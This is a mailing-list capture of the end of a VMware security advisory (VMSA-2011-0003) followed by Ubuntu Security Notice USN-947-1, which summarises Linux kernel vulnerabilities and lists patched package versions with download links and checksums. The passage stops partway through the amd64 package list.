CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5416 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0086 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0106 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2928 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0082 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0084 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0087 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0088 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0089 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0090 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0091 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0092 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0095 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0837 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0839 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0841 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0843 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0844 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0845 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0846 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0847 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0849 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0850 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2693 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2901 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2902 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2227 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1157 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0740 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0433 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3864 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0734 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3825 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1084 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2066 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2070 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2248 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2521 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2524 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0008 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0415 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0437 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4308 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0003 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0007 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0307 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1086 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0410 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0730 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0291 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0622 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1087 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1088 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1187 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1436 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1641 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3081 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3556 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3550 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3561 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3573 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3565 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3568 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1321 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3551 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3562 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3554 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3559 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3553 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3549 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3557 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3541 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3574


  1. Change log

2011-02-10 VMSA-2011-0003 Initial security advisory in conjunction with the release of vCenter Server 4.1 Update 1, vCenter Update Manager 4.1 Update 1, ESXi 4.1 Update 1, and ESX 4.1 Update 1 on 2011-02-10.


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Advisories http://www.vmware.com/security/advisories

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2011 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32)

iEYEARECAAYFAk1U1eoACgkQS2KysvBH1xm3swCfeh4sWvPOubDT1K7QlRj3SjW9 dxYAmwbNLMR9IG/rKZDYh9hqcf4IldCX =2pVj -----END PGP SIGNATURE-----


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . =========================================================== Ubuntu Security Notice USN-947-1 June 03, 2010 linux, linux-source-2.6.15 vulnerabilities CVE-2009-4271, CVE-2009-4537, CVE-2010-0008, CVE-2010-0298, CVE-2010-0306, CVE-2010-0419, CVE-2010-0437, CVE-2010-0727, CVE-2010-0741, CVE-2010-1083, CVE-2010-1084, CVE-2010-1085, CVE-2010-1086, CVE-2010-1087, CVE-2010-1088, CVE-2010-1146, CVE-2010-1148, CVE-2010-1162, CVE-2010-1187, CVE-2010-1188, CVE-2010-1488 ===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS: linux-image-2.6.15-55-386 2.6.15-55.84 linux-image-2.6.15-55-686 2.6.15-55.84 linux-image-2.6.15-55-amd64-generic 2.6.15-55.84 linux-image-2.6.15-55-amd64-k8 2.6.15-55.84 linux-image-2.6.15-55-amd64-server 2.6.15-55.84 linux-image-2.6.15-55-amd64-xeon 2.6.15-55.84 linux-image-2.6.15-55-hppa32 2.6.15-55.84 linux-image-2.6.15-55-hppa32-smp 2.6.15-55.84 linux-image-2.6.15-55-hppa64 2.6.15-55.84 linux-image-2.6.15-55-hppa64-smp 2.6.15-55.84 linux-image-2.6.15-55-itanium 2.6.15-55.84 linux-image-2.6.15-55-itanium-smp 2.6.15-55.84 linux-image-2.6.15-55-k7 2.6.15-55.84 linux-image-2.6.15-55-mckinley 2.6.15-55.84 linux-image-2.6.15-55-mckinley-smp 2.6.15-55.84 linux-image-2.6.15-55-powerpc 2.6.15-55.84 linux-image-2.6.15-55-powerpc-smp 2.6.15-55.84 linux-image-2.6.15-55-powerpc64-smp 2.6.15-55.84 linux-image-2.6.15-55-server 2.6.15-55.84 linux-image-2.6.15-55-server-bigiron 2.6.15-55.84 linux-image-2.6.15-55-sparc64 2.6.15-55.84 linux-image-2.6.15-55-sparc64-smp 2.6.15-55.84

Ubuntu 8.04 LTS: linux-image-2.6.24-28-386 2.6.24-28.70 linux-image-2.6.24-28-generic 2.6.24-28.70 linux-image-2.6.24-28-hppa32 2.6.24-28.70 linux-image-2.6.24-28-hppa64 2.6.24-28.70 linux-image-2.6.24-28-itanium 2.6.24-28.70 linux-image-2.6.24-28-lpia 2.6.24-28.70 linux-image-2.6.24-28-lpiacompat 2.6.24-28.70 linux-image-2.6.24-28-mckinley 2.6.24-28.70 linux-image-2.6.24-28-openvz 2.6.24-28.70 linux-image-2.6.24-28-powerpc 2.6.24-28.70 linux-image-2.6.24-28-powerpc-smp 2.6.24-28.70 linux-image-2.6.24-28-powerpc64-smp 2.6.24-28.70 linux-image-2.6.24-28-rt 2.6.24-28.70 linux-image-2.6.24-28-server 2.6.24-28.70 linux-image-2.6.24-28-sparc64 2.6.24-28.70 linux-image-2.6.24-28-sparc64-smp 2.6.24-28.70 linux-image-2.6.24-28-virtual 2.6.24-28.70 linux-image-2.6.24-28-xen 2.6.24-28.70

Ubuntu 9.04: linux-image-2.6.28-19-generic 2.6.28-19.61 linux-image-2.6.28-19-imx51 2.6.28-19.61 linux-image-2.6.28-19-iop32x 2.6.28-19.61 linux-image-2.6.28-19-ixp4xx 2.6.28-19.61 linux-image-2.6.28-19-lpia 2.6.28-19.61 linux-image-2.6.28-19-server 2.6.28-19.61 linux-image-2.6.28-19-versatile 2.6.28-19.61 linux-image-2.6.28-19-virtual 2.6.28-19.61

Ubuntu 9.10: linux-image-2.6.31-112-imx51 2.6.31-112.28 linux-image-2.6.31-214-dove 2.6.31-214.28 linux-image-2.6.31-214-dove-z0 2.6.31-214.28 linux-image-2.6.31-22-386 2.6.31-22.60 linux-image-2.6.31-22-generic 2.6.31-22.60 linux-image-2.6.31-22-generic-pae 2.6.31-22.60 linux-image-2.6.31-22-ia64 2.6.31-22.60 linux-image-2.6.31-22-lpia 2.6.31-22.60 linux-image-2.6.31-22-powerpc 2.6.31-22.60 linux-image-2.6.31-22-powerpc-smp 2.6.31-22.60 linux-image-2.6.31-22-powerpc64-smp 2.6.31-22.60 linux-image-2.6.31-22-server 2.6.31-22.60 linux-image-2.6.31-22-sparc64 2.6.31-22.60 linux-image-2.6.31-22-sparc64-smp 2.6.31-22.60 linux-image-2.6.31-22-virtual 2.6.31-22.60 linux-image-2.6.31-307-ec2 2.6.31-307.15

Ubuntu 10.04 LTS: linux-image-2.6.31-608-imx51 2.6.31-608.14 linux-image-2.6.31-802-st1-5 2.6.31-802.4 linux-image-2.6.32-205-dove 2.6.32-205.18 linux-image-2.6.32-22-386 2.6.32-22.35 linux-image-2.6.32-22-386-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-generic 2.6.32-22.35 linux-image-2.6.32-22-generic-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-generic-pae 2.6.32-22.35 linux-image-2.6.32-22-generic-pae-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-ia64 2.6.32-22.35 linux-image-2.6.32-22-ia64-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-lpia 2.6.32-22.35 linux-image-2.6.32-22-lpia-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-powerpc 2.6.32-22.35 linux-image-2.6.32-22-powerpc-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-powerpc-smp 2.6.32-22.35 linux-image-2.6.32-22-powerpc-smp-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-powerpc64-smp 2.6.32-22.35 linux-image-2.6.32-22-powerpc64-smp-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-preempt 2.6.32-22.35 linux-image-2.6.32-22-preempt-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-server 2.6.32-22.35 linux-image-2.6.32-22-server-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-sparc64 2.6.32-22.35 linux-image-2.6.32-22-sparc64-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-sparc64-smp 2.6.32-22.35 linux-image-2.6.32-22-sparc64-smp-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-versatile 2.6.32-22.35 linux-image-2.6.32-22-versatile-dbgsym 2.6.32-22.35 linux-image-2.6.32-22-virtual 2.6.32-22.35 linux-image-2.6.32-306-ec2 2.6.32-306.11 linux-image-2.6.33-501-omap 2.6.33-501.7

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

Details follow:

It was discovered that the Linux kernel did not correctly handle memory protection of the Virtual Dynamic Shared Object page when running a 32-bit application on a 64-bit kernel. (Only affected Ubuntu 6.06 LTS.) (CVE-2009-4271)

It was discovered that the r8169 network driver did not correctly check the size of Ethernet frames. A remote attacker could send specially crafted traffic to crash the system, leading to a denial of service. (CVE-2009-4537)

Wei Yongjun discovered that SCTP did not correctly validate certain chunks. A remote attacker could send specially crafted traffic to monopolize CPU resources, leading to a denial of service. (Only affected Ubuntu 6.06 LTS.) (CVE-2010-0008)

It was discovered that KVM did not correctly limit certain privileged IO accesses on x86. Processes in the guest OS with access to IO regions could gain further privileges within the guest OS. (Did not affect Ubuntu 6.06 LTS.) (CVE-2010-0298, CVE-2010-0306, CVE-2010-0419)

Evgeniy Polyakov discovered that IPv6 did not correctly handle certain TUN packets. (Only affected Ubuntu 8.04 LTS.) (CVE-2010-0437)

Sachin Prabhu discovered that GFS2 did not correctly handle certain locks. A local attacker with write access to a GFS2 filesystem could exploit this to crash the system, leading to a denial of service. (CVE-2010-0727)

Jamie Strandboge discovered that network virtio in KVM did not correctly handle certain high-traffic conditions. A remote attacker could exploit this by sending specially crafted traffic to a guest OS, causing the guest to crash, leading to a denial of service. (Only affected Ubuntu 8.04 LTS.) (CVE-2010-0741)

Marcus Meissner discovered that the USB subsystem did not correctly handle certain error conditions. A local attacker with access to a USB device could exploit this to read recently used kernel memory, leading to a loss of privacy and potentially root privilege escalation. (CVE-2010-1083)

Neil Brown discovered that the Bluetooth subsystem did not correctly handle large amounts of traffic. A physically proximate remote attacker could exploit this by sending specially crafted traffic that would consume all available system memory, leading to a denial of service. (Ubuntu 6.06 LTS and 10.04 LTS were not affected.) (CVE-2010-1084)

Jody Bruchon discovered that the sound driver for the AMD780V did not correctly handle certain conditions. A local attacker with access to this hardward could exploit the flaw to cause a system crash, leading to a denial of service. (CVE-2010-1085)

Ang Way Chuang discovered that the DVB driver did not correctly handle certain MPEG2-TS frames. An attacker could exploit this by delivering specially crafted frames to monopolize CPU resources, leading to a denial of service. (Ubuntu 10.04 LTS was not affected.) (CVE-2010-1086)

Trond Myklebust discovered that NFS did not correctly handle truncation under certain conditions. A local attacker with write access to an NFS share could exploit this to crash the system, leading to a denial of service. (Ubuntu 10.04 LTS was not affected.) (CVE-2010-1087)

Al Viro discovered that automount of NFS did not correctly handle symlinks under certain conditions. A local attacker could exploit this to crash the system, leading to a denial of service. (Ubuntu 6.06 LTS and Ubuntu 10.04 LTS were not affected.) (CVE-2010-1088)

Matt McCutchen discovered that ReiserFS did not correctly protect xattr files in the .reiserfs_priv directory. (CVE-2010-1146)

Eugene Teo discovered that CIFS did not correctly validate arguments when creating new files. A local attacker could exploit this to crash the system, leading to a denial of service, or possibly gain root privileges if mmap_min_addr was not set. (CVE-2010-1148)

Catalin Marinas and Tetsuo Handa discovered that the TTY layer did not correctly release process IDs. A local attacker could exploit this to consume kernel resources, leading to a denial of service. (CVE-2010-1162)

Neil Horman discovered that TIPC did not correctly check its internal state. A local attacker could send specially crafted packets via AF_TIPC that would cause the system to crash, leading to a denial of service. (Ubuntu 6.06 LTS was not affected.) (CVE-2010-1187)

Masayuki Nakagawa discovered that IPv6 did not correctly handle certain settings when listening. If a socket were listening with the IPV6_RECVPKTINFO flag, a remote attacker could send specially crafted traffic that would cause the system to crash, leading to a denial of service. (Only Ubuntu 6.06 LTS was affected.) (CVE-2010-1188)

Oleg Nesterov discovered that the Out-Of-Memory handler did not correctly handle certain arrangements of processes. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-1488)

Updated packages for Ubuntu 6.06 LTS:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84.diff.gz
  Size/MD5:  2960435 33b09ecaf8a52ac8518c34163d53c5ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84.dsc
  Size/MD5:     2439 ddd8f898074d4b56e18fa00cecaed4d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15.orig.tar.gz
  Size/MD5: 57403387 88ab0747cb8c2ceed662e0fd1b27d81d

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-doc-2.6.15_2.6.15-55.84_all.deb
  Size/MD5:  5166142 6bb2a7cc886f5f258e598f8257386c4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-kernel-devel_2.6.15-55.84_all.deb
  Size/MD5:    96900 4d56e3ffc13abbd559252d961582928e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.84_all.deb
  Size/MD5: 44742758 a29467cb2571e45b5ba4cc52f49d402e

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    22344 22df0e2142b58bfc5089997ba68f8a32
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    44772 e38fce9b303eb280f9de5b6bf4321539
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:     2312 519dde14b25bcb6f72b50b10fb2b8c42
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    36298 529530b75bc9d308a36945e253829337
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext3-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   102370 db98ff5f9e6e356af90422da4190fcba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    38890 0d2cb99466cf014ba83ad3a38cd759f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    49144 7e51d739d81751a717fd33393d9b5698
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   176620 61c26ebee2f9b56ab2ae781caaa78f16
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/floppy-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    36774 32797f4fc4204eeb5185a17019dc5cd2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ide-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   142346 50314cb83693e27a2f515836bfb81adf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    51062 c7f26b13e057743d95d90c6ed1feb7be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   140712 60824c117e8e10faa8502405dc64b756
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   287612 e599c71e4f9f791bfcbb5a8e148fa02d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    97832 923d2dbedfa2bb0ce20db2af510ec3ae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:  1652310 a49bd3692b26b2776eddd3218049ad31
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-generic_2.6.15-55.84_amd64.deb
  Size/MD5:   869218 c54b14fff14e6f36a6f5424bf28ba5ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.84_amd64.deb
  Size/MD5:   868510 e7741f1995f864eea030c242abac8085
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-server_2.6.15-55.84_amd64.deb
  Size/MD5:   871276 ad7e3f9695e48c13d78024d9cebb4bdc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-xeon_2.6.15-55.84_amd64.deb
  Size/MD5:   870704 c3dd9b5335fa41ab82df7f691cee2a46
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55_2.6.15-55.84_amd64.deb
  Size/MD5:  6925588 e85a966dd3fd31a092a504e4c4383820
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.84_amd64.deb
  Size/MD5: 20817472 f8e7d44b2a3bd9dc72917fd16c2628ff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-k8_2.6.15-55.84_amd64.deb
  Size/MD5: 20798306 fe88a926a6ce4b4465ad88a493a48357
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.84_amd64.deb
  Size/MD5: 21635330 8174ddfff1140d94b76678739c9f15c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-xeon_2.6.15-55.84_amd64.deb
  Size/MD5: 19905746 58501fc8aca4794202804578b4e29415
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    15626 94656d1862678ee9b6a3a62f90919629
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   240372 faf0cd25cfd49759685f8a9b725e305d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   202684 fec1b04e98e48c0e354e9a47cb00d601
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:  1048610 a5ff74bb5b40c0b6929d535abade30be
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:  1543792 217e245037c3d6c48687b594c932025b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   161696 969b188d1e7f285fc30f39e17ebd349b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:     9834 c6278cf04b4dbb788d0eebaf599c005e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    80872 2fb47b12ddf5767a51bdc1d4e1f05e52
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ntfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    49294 f27115bb56ba683c95c915de40a46afc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    35162 4e92b8742d5ad65bf0d915d9c216c4ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    70894 c7525221ee4847b254c1839cdd4d0b31
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:     6220 8d1ee1256a6d3942c10dd7731bd34d21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:     9062 f120989e7b729addea0a373b6c6b81a8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    57922 16f0dd4d6e989ec1684074667b9c1133
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   123378 b2797adf33289dd9c99525971a8d001b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:   101080 0b923143d4fb260149446550b64529d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    79278 950ccff4d598e5f9c62d4ffcea1b4b66
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:  1595422 5d2e9b2d898d39363c3cab3c67391c0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.84_amd64.udeb
  Size/MD5:    72356 2fdf60644e4d13a5c9732d48e3b6b025
